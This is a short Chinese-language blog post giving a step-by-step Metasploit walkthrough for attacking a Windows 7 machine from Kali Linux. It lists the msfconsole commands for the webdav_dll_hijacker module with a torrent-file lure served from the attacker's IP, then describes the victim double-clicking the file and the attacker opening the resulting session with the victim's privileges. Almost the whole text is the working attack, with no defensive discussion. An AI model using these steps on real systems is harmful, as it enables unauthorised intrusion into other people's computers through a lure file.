版权声明:转载请注明出处:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/80155813
环境:kali2018.1(攻击者),win7任意版本(目标,受害者)
说明:#表示root权限,$表示普通用户权限
操作:
# msfconsole
use exploit/windows/browser/webdav_dll_hijacker
set extensions torrent
set srvhost 攻击者的IP
exploit
此时看到生成的文件被自动放在了一个路径下(需要至少有初中的英文水准去阅读回显内容,才能找到路径)
受害者使用资源管理或者浏览器取访问这个路径
受害者双击种子文件,进行访问。(不少用户的习惯就是这样)
攻击者可以看到,接收到一个会话连接。
sessions -i 1
成功访问受害者,并且得到了访问种子的用户的权限。